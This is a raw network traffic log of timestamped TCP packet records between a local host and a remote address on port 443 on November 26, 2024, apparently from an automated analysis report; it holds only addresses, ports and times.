Nov 26, 2024 08:13:01.799175978 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.799240112 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.799259901 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.799403906 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.817595005 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.817615986 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.817687035 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.817708969 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.817751884 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.838861942 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.838897943 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.838943958 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.838968039 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.838995934 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.839004993 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.942296028 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.942331076 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.942410946 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.942425013 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.942473888 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.956950903 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.956974983 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.957098007 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.957115889 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.957165956 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.972062111 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.972095013 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.972256899 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.972256899 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.972275972 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.972315073 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.986757994 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.986780882 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.986841917 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.986857891 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.986872911 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.986896992 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.000430107 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.000449896 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.000529051 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.000539064 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.000550032 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.000576019 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.015228033 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.015250921 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.015328884 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.015337944 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.015373945 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.027924061 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.027949095 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.028023005 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.028033018 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.028069973 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.042556047 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.042586088 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.042644978 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.042654037 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.042692900 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.132498026 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.132529974 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.132647991 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.132677078 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.132715940 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.141904116 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.141927958 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.142046928 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.142066002 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.142102957 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.152020931 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.152044058 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.152138948 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.152157068 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.152209997 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.161731005 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.161753893 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.161848068 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.161864042 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.161978006 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.170429945 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.170461893 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.170521975 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.170538902 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.170551062 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.170582056 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.179553032 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.179573059 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.179646969 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.179665089 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.179708004 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.188287973 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.188309908 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.188380003 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.188395023 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.188405991 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.188430071 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.196610928 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.196635008 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.196693897 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.196712017 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.196747065 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.322552919 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.322586060 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.322685957 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.322700977 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.322740078 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.322783947 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.328449965 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.328474045 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.328551054 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.328561068 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.328596115 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.328622103 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.338613033 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.338635921 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.338710070 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.338722944 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.338762999 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.342221975 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.342246056 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.342331886 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.342344046 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.342375994 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.348525047 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.348546028 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.348612070 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.348623991 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.348675966 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.355520964 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.355542898 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.355607033 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.355617046 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.355654955 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.361615896 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.361639023 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.361697912 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.361709118 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.361745119 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.368490934 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.368511915 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.368568897 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.368582964 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.368618965 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.513696909 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.513734102 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.513847113 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.513870955 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.513914108 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.519630909 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.519651890 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.519717932 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.519726992 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.519762039 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.526494980 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.526515007 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.526576042 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.526587009 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.526612043 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.526631117 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.533293009 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.533318996 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.533387899 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.533397913 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.533436060 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.539772034 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.539788961 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.539853096 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.539861917 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.539897919 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.546681881 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.546698093 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.546763897 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.546771049 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.546806097 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.552779913 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.552795887 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.552836895 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.552848101 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.552871943 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.552890062 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.559590101 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.559607029 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.559672117 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.559680939 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.559719086 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.705641985 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.705667019 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.705765963 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.705782890 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.705831051 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.711709976 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.711728096 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.711821079 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.711833954 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.711870909 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.718516111 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.718533993 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.718604088 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.718612909 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.718650103 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.725322962 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.725341082 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.725409031 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.725426912 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.725440979 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.725464106 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.731969118 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.731987000 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.732053041 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.732068062 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.732108116 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.738715887 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.738732100 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.738785982 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.738804102 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.738816977 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.738835096 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.744667053 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.744683981 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.744735956 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.744750023 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.744782925 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.751698971 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.751717091 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.751851082 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.751866102 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.751910925 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.897679090 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.897715092 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.897768974 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.897789955 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.897819996 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.897834063 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.904455900 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.904474974 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.904526949 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.904542923 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.904581070 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.910933971 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.910955906 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.911010027 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.911025047 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.911057949 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.917289019 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.917309046 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.917349100 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.917363882 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.917385101 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.917399883 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.923899889 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.923922062 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.924025059 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.924040079 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.924089909 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.930686951 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.930707932 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.930780888 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.930795908 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.930835009 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.938550949 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.938587904 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.938641071 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.938648939 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.938668966 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.938688993 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.943519115 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.943547010 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.943598986 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.943610907 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:02.943641901 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:02.943656921 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.089428902 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.089462042 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.089535952 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.089559078 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.089607000 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.096256971 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.096282005 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.096347094 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.096353054 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.096410990 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.102849960 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.102869987 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.102929115 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.102936983 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.102967024 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.102986097 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.109241009 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.109260082 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.109324932 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.109333038 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.109385967 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.115648031 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.115669012 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.115752935 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.115761995 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.115786076 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.115793943 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.122555971 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.122582912 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.122685909 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.122704983 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.122750044 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.129371881 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.129396915 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.129456997 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.129471064 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.129497051 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.129515886 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.135423899 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.135452032 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.135498047 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.135504961 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.135536909 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.135551929 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.166600943 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.283685923 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.283715010 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.283763885 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.283782005 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.283808947 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.283824921 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.290262938 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.290282965 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.290354013 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.290361881 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.290400982 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.294922113 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.294944048 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.295001984 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.295010090 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.295053959 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.301278114 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.301300049 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.301373959 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.301382065 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.301422119 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.307682037 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.307701111 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:03.307777882 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:03.307786942 CET	443	49705	198.252.105.91	192.168.2.5
